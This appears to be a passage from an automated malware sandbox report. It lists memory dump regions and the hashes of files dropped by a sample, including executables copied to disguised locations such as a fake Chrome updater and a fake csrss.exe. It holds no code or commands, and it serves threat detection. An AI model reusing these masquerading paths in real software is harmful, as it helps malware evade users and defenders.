memory/3040-466-0x000000001B1B0000-0x000000001B492000-memory.dmp

memory/3040-469-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/3040-468-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

memory/3040-467-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/3040-472-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/3040-471-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/3040-470-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

memory/3040-473-0x0000000002540000-0x00000000025C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe

MD5 8627c70b06ccae7c64acdd10a0d5d0ae
SHA1 fd87db535189654374d269e59ff1dd62020e4464
SHA256 a000684c9fcd2d5a528161a3513f726b2307fa6b50788a568fec0930b452d59e
SHA512 a4ba244cc35acd7be1a75239d0d6e148a0fd46d8fb09d650ccffc00c4e5f891b0810a316b28f08f1f2a19b2fdcb9097bcba5a6fe04c39a7d83e4dcf194dfdd99

memory/772-477-0x00000000049D0000-0x0000000004DC8000-memory.dmp

memory/772-478-0x0000000000400000-0x0000000002FB8000-memory.dmp

memory/3040-479-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2236-494-0x0000000000400000-0x0000000002FB8000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

\Windows\rss\csrss.exe

MD5 8627c70b06ccae7c64acdd10a0d5d0ae
SHA1 fd87db535189654374d269e59ff1dd62020e4464
SHA256 a000684c9fcd2d5a528161a3513f726b2307fa6b50788a568fec0930b452d59e
SHA512 a4ba244cc35acd7be1a75239d0d6e148a0fd46d8fb09d650ccffc00c4e5f891b0810a316b28f08f1f2a19b2fdcb9097bcba5a6fe04c39a7d83e4dcf194dfdd99

memory/772-509-0x0000000000400000-0x0000000002FB8000-memory.dmp

memory/2688-508-0x00000000049F0000-0x0000000004DE8000-memory.dmp

memory/2688-510-0x0000000000400000-0x0000000002FB8000-memory.dmp

memory/2432-557-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09